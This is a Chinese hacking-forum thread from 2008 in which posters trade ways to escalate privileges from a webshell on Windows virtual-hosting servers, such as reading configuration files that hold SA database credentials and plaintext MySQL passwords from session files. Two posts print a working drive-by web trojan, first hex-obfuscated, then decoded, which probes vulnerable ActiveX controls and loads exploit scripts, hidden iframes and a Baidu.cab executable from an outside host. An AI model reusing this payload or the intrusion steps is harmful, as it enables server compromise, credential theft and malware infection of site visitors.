标题:
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
[打印本页]
作者:
richy
时间:
2008-7-22 09:43
标题:
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
[讨论]WEB虚拟系统搞不定 来论坛讨论一下
议题作者:basiner
信息来源:邪恶八进制
不说废话了。
网站是ACCESS数据库,海洋顶端木马,系统Windows 2003 可以执行命令,权限guest,标准虚拟主机权限分配,ASPX不能执行。本机开了MSSQL,折腾半天找不到用户和密码。但是在硬盘的零散文件中找到内网一台机器的MSSQL用户和密码,DBOWER权限。
貌似这台机器用的潮流虚拟服务器软件,smartweb 6.6。不知道各位大侠对这个软件熟悉否。
附件中有FTP,和MAIL程序。
未命名.JPG
(36 KB)
2008-1-28 16:20
附件
service.rar
(870 KB)
2008-1-28 16:20, 下载次数: 100
帖子9 精华
0
积分28 阅读权限40 性别男 在线时间46 小时 注册时间2006-6-9 最后登录2008-2-6
查看详细资料
引用
报告
回复
TOP
软件项目外包
kingdog
晶莹剔透§烈日灼然
作者:
神童
时间:
2008-7-22 09:43
我也有一websehll是浪潮虚拟主机的。也搞不定。
帖子4 精华
0
积分14 阅读权限40 性别男 在线时间17 小时 注册时间2006-3-31 最后登录2008-7-2
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
jurone
晶莹剔透§烈日灼然
作者:
hycmx
时间:
2008-7-22 09:43
借地发个贴,
遇见一个免杀的网马,不会解密
<script>window.onerror=function(){return true;}</script>
<script>
eval("\x69\x66\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x27\x4f\x4b\x27\x29\x3d\x3d\x2d\x31\x29\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x65\x65\x65\x65\x65\x65\x65\x65\x3b\x0d\x0a\x76\x61\x72\x20\x61\x64\x6f\x3d\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74\x28\x22\x5c\x78\x36\x66\x5c\x78\x36\x32\x5c\x78\x36\x61\x5c\x78\x36\x35\x5c\x78\x36\x33\x5c\x78\x37\x34\x22\x29\x29\x3b\x0d\x0a\x76\x61\x72\x20\x52\x69\x73\x69\x6e\x67\x3d\x22\x5c\x78\x36\x33\x5c\x78\x36\x63\x5c\x78\x36\x31\x5c\x78\x37\x33\x5c\x78\x37\x33\x5c\x78\x36\x39\x5c\x78\x36\x34\x22\x3b\x0d\x0a\x76\x61\x72\x20\x4b\x56\x32\x30\x30\x38\x3d\x22\x5c\x78\x34\x31\x5c\x78\x36\x34\x5c\x78\x36\x66\x5c\x78\x36\x34\x5c\x78\x36\x32\x5c\x78\x32\x65\x5c\x78\x35\x33\x5c\x78\x37\x34\x5c\x78\x37\x32\x5c\x78\x36\x35\x5c\x78\x36\x31\x5c\x78\x36\x64\x22\x3b\x0d\x0a\x76\x61\x72\x20\x4b\x61\x73\x70\x65\x72\x73\x6b\x79\x3d\x22\x5c\x78\x36\x33\x5c\x78\x36\x63\x5c\x78\x37\x33\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x33\x61\x5c\x78\x34\x32\x5c\x78\x34\x34\x5c\x78\x33\x39\x5c\x78\x33\x36\x5c\x78\x34\x33\x5c\x78\x33\x35\x5c\x78\x33\x35\x5c\x78\x33\x36\x5c\x78\x32\x64\x5c\x78\x33\x36\x5c\x78\x33\x35\x5c\x78\x34\x31\x5c\x78\x33\x33\x5c\x78\x32\x64\x5c\x78\x33\x31\x5c\x78\x33\x31\x5c\x78\x34\x34\x5c\x78\x33\x30\x5c\x78\x32\x64\x5c\x78\x33\x39\x5c\x78\x33\x38\x5c\x78\x33\x33\x5c\x78\x34\x31\x5c\x78\x32\x64\x5c\x78\x33\x30\x5c\x78\x33\x30\x5c\x78\x34\x33\x5c\x78\x33\x30\x5c\x78\x33\x34\x5c\x78\x34\x36\x5c\x78\x34\x33\x5c\x78\x33\x32\x5c\x78\x33\x39\x5c\x78\x34\x35\x5c\x78\x33\x33\x5c\x78\x33\x36\x22\x3b\x0d\x0a\x61\x64\x6f\x2e\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x52\x69\x73\x69\x6e\x67\x2c\x4b\x61\x73\x70\x65\x72\x73\x6b\x79\x29\x3b\x0d\x0a\x76\x61\x72\x20\x61\x73\x3d\x61\x64\x6f\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x4b\x56\x32\x30\x30\x38\x2c\x22\x22\x29\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x65\x65\x65\x65\x65\x65\x65\x65\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x0d\x0a\x76\x61\x72\x20\x65\x78\x70\x69\x72\x65\x73\x3d\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x0d\x0a\x65\x78\x70\x69\x72\x65\x73\x2e\x73\x65\x74\x54\x69\x6d\x65\x28\x65\x78\x70\x69\x72\x65\x73\x2e\x67\x65\x74\x54\x69\x6d\x65\x28\x29\x2b\x33\x2a\x36\x30\x2a\x36\x30\x2a\x31\x30\x30\x30\x29\x3b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x3d\x27\x4f\x4b\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d\x27\x2b\x65\x78\x70\x69\x72\x65\x73\x2e\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x0d\x0a\x69\x66\x28\x65\x65\x65\x65\x65\x65\x65\x65\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x5c\x2f\x6d\x73\x30\x36\x30\x31\x34\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x22\x29\x7d\x0d\x0a\x65\x6c\x73\x65\x7b\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x66\x66\x66\x66\x66\x66\x66\x66\x3b\x0d\x0a\x76\x61\x72\x20\x6f\x75\x72\x67\x61\x6d\x65\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x37\x5c\x78\x34\x63\x5c\x78\x34\x33\x5c\x78\x34\x38\x5c\x78\x34\x31\x5c\x78\x35\x34\x5c\x78\x32\x65\x5c\x78\x34\x37\x5c\x78\x34\x63\x5c\x78\x34\x33\x5c\x78\x36\x38\x5c\x78\x36\x31\x5c\x78\x37\x34\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x37\x32\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x33\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x66\x66\x66\x66\x66\x66\x66\x66\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x66\x66\x66\x66\x66\x66\x66\x66\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x47\x4c\x57\x4f\x52\x4c\x44\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x67\x67\x67\x67\x67\x67\x67\x67\x3b\x0d\x0a\x76\x61\x72\x20\x73\x74\x6f\x72\x6d\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x64\x5c\x78\x35\x30\x5c\x78\x35\x33\x5c\x78\x32\x65\x5c\x78\x35\x33\x5c\x78\x37\x34\x5c\x78\x36\x66\x5c\x78\x37\x32\x5c\x78\x36\x64\x5c\x78\x35\x30\x5c\x78\x36\x63\x5c\x78\x36\x31\x5c\x78\x37\x39\x5c\x78\x36\x35\x5c\x78\x37\x32\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x67\x67\x67\x67\x67\x67\x67\x67\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x67\x67\x67\x67\x67\x67\x67\x67\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x53\x74\x6f\x72\x6d\x49\x49\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x68\x68\x68\x68\x68\x68\x68\x68\x3b\x0d\x0a\x76\x61\x72\x20\x52\x65\x61\x6c\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x39\x5c\x78\x34\x35\x5c\x78\x35\x32\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x34\x39\x5c\x78\x34\x35\x5c\x78\x35\x32\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x37\x34\x5c\x78\x36\x63\x5c\x78\x32\x65\x5c\x78\x33\x31\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x68\x68\x68\x68\x68\x68\x68\x68\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x68\x68\x68\x68\x68\x68\x68\x68\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x73\x43\x72\x49\x70\x54\x20\x4c\x41\x6e\x47\x75\x41\x67\x45\x3d\x22\x6a\x41\x76\x41\x73\x43\x72\x49\x70\x54\x22\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x5c\x2f\x5c\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x5c\x2f\x72\x65\x61\x6c\x2e\x6a\x73\x3e\x3c\x5c\x2f\x73\x63\x72\x69\x70\x74\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x69\x69\x69\x69\x69\x69\x69\x69\x3b\x0d\x0a\x76\x61\x72\x20\x74\x68\x75\x6e\x64\x65\x72\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x34\x5c\x78\x35\x30\x5c\x78\x34\x33\x5c\x78\x36\x63\x5c\x78\x36\x39\x5c\x78\x36\x35\x5c\x78\x36\x65\x5c\x78\x37\x34\x5c\x78\x32\x65\x5c\x78\x35\x36\x5c\x78\x36\x66\x5c\x78\x36\x34\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x69\x69\x69\x69\x69\x69\x69\x69\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x69\x69\x69\x69\x69\x69\x69\x69\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x54\x68\x75\x6e\x64\x65\x72\x2e\x68\x74\x6d\x6c\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x27\x29\x7d\x7d\x0d\x0a\x74\x72\x79\x7b\x76\x61\x72\x20\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x3b\x0d\x0a\x76\x61\x72\x20\x42\x61\x69\x64\x75\x3d\x6e\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x37\x35\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x37\x32\x5c\x78\x32\x65\x5c\x78\x35\x34\x5c\x78\x36\x66\x5c\x78\x36\x66\x5c\x78\x36\x63\x22\x29\x3b\x7d\x0d\x0a\x63\x61\x74\x63\x68\x28\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x29\x7b\x7d\x3b\x0d\x0a\x66\x69\x6e\x61\x6c\x6c\x79\x7b\x69\x66\x28\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x6b\x21\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x7b\x0d\x0a\x42\x61\x69\x64\x75\x5b\x22\x5c\x78\x34\x34\x5c\x78\x36\x63\x5c\x78\x36\x66\x5c\x78\x36\x31\x5c\x78\x36\x34\x5c\x78\x34\x34\x5c\x78\x35\x33\x22\x5d\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x78\x78\x2e\x63\x6b\x61\x62\x63\x2e\x6e\x65\x74\x2f\x42\x61\x69\x64\x75\x2e\x63\x61\x62\x22\x2c\x20\x22\x5c\x78\x34\x32\x5c\x78\x36\x31\x5c\x78\x36\x39\x5c\x78\x36\x34\x5c\x78\x37\x35\x5c\x78\x32\x65\x5c\x78\x36\x35\x5c\x78\x37\x38\x5c\x78\x36\x35\x22\x2c\x20\x30\x29\x7d\x7d\x0d\x0a\x69\x66\x28\x66\x66\x66\x66\x66\x66\x66\x66\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x67\x67\x67\x67\x67\x67\x67\x67\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x68\x68\x68\x68\x68\x68\x68\x68\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x20\x26\x26\x20\x69\x69\x69\x69\x69\x69\x69\x69\x3d\x3d\x22\x5b\x6f\x62\x6a\x65\x63\x74\x20\x45\x72\x72\x6f\x72\x5d\x22\x29\x0d\x0a\x7b\x0d\x0a\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x22\x61\x62\x6f\x75\x74\x3a\x62\x6c\x61\x6e\x6b\x22\x29\x3b\x7d\x0d\x0a\x7d\x7d\x7d")
</script>
帖子5 精华
0
积分11 阅读权限40 性别男 在线时间4 小时 注册时间2006-9-9 最后登录2008-7-13
查看详细资料
引用
报告
回复
TOP
爱要怎么说出口
winger
晶莹剔透§烈日灼然
作者:
紫绫
时间:
2008-7-22 09:43
楼上的则肯定免杀啊
只是挂马页
<script>window.onerror=function(){return true;}</script>
<script>
eval(“if(document.cookie.indexOf('OK')==-1){
try{var eeeeeeee;
var ado=(document.createElement("\x6f\x62\x6a\x65\x63\x74"));
var Rising="\x63\x6c\x61\x73\x73\x69\x64";
var KV2008="\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d";
var Kaspersky="\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(eeeeeeee){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(eeeeeeee!="[object Error]"){
document.write("<script src=http:\/\/xxx.ckabc.net\/ms06014.js><\/script>")}
else{
try{var ffffffff;
var ourgame=new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/GLWORLD.html"></iframe>')}}
try{var gggggggg;
var storm=new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72");}
catch(gggggggg){};
finally{if(gggggggg!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/StormII.html"></iframe>')}}
try{var hhhhhhhh;
var Real=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6c\x2e\x49\x45\x52\x50\x43\x74\x6c\x2e\x31");}
catch(hhhhhhhh){};
finally{if(hhhhhhhh!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/xxx.ckabc.net\/real.js><\/script>')}}
try{var iiiiiiii;
var thunder=new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64");}
catch(iiiiiiii){};
finally{if(iiiiiiii!="[object Error]"){
document.write('<iframe style=display:none src="http://xxx.ckabc.net/Thunder.html"></iframe>')}}
try{var kkkkkkkk;
var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
catch(kkkkkkkk){};
finally{if(kkkkkkkk!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xxx.ckabc.net/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")
{
location.replace("about:blank");}
}}}")
</script>天空之翼 谁曾纷飞
帖子6 精华
0
积分105 阅读权限40 来自天堂 在线时间29 小时 注册时间2006-1-4 最后登录2008-7-14
查看详细资料
引用
报告
回复
TOP
vertusd
晶莹剔透§烈日灼然
作者:
沙包
时间:
2008-7-22 09:43
这几天在弄一个虚拟主机,设置蛮BT的,不能运行程序,传个CMD只能运行很少的命令,硬盘大部分位置也不能浏览,程序的目录也设置的BT.不过我发现读注册表很有用,将主机上的主要程序路径几乎都暴了,不过大部分不能写入,最后发现ZEND的目录里面可写,不过PHP上传失败,明明有写入权,而ASP马写入失败,另一方面,主机有PHPMYADMIN,在C:windows/temp目录下发现有SESSION临时文件,里面竟然有一些MYSQL用户的明文密码!!,不过权限也BT,没有文件权。服务器也有MsSQL,现在只有继续旁注的方法搞了,大家有什么思路没有,
特别是暴路径,不过每个虚拟路径都是单独用户,无法跳转,不过知道总比不知道的好的说
帖子8 精华
0
积分25 阅读权限40 在线时间31 小时 注册时间2007-1-10 最后登录2008-6-9
查看详细资料
引用
报告
回复
TOP
让女孩一夜变的更有女人味
zhuziliu
晶莹剔透§烈日灼然
作者:
死性不改
时间:
2008-7-22 09:43
楼主可以看下system32下面有没有Z_Tide.ini这个文件,里面应该有些内容。
system32下面应该还有一个MsSqlDbConf.ini文件,里面的用户是SA权限。
帖子21 精华
0
积分70 阅读权限40 在线时间207 小时 注册时间2005-7-3 最后登录2008-7-18
查看详细资料
引用
报告
回复
TOP
良辰择日,预测咨询,公司改名,权威易经
hushui
晶莹剔透§烈日灼然
作者:
6G150
时间:
2008-7-22 09:43
地板上的同学
有了mysql密码,楼主可以试下在cmd下运行php程序,然后提权
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2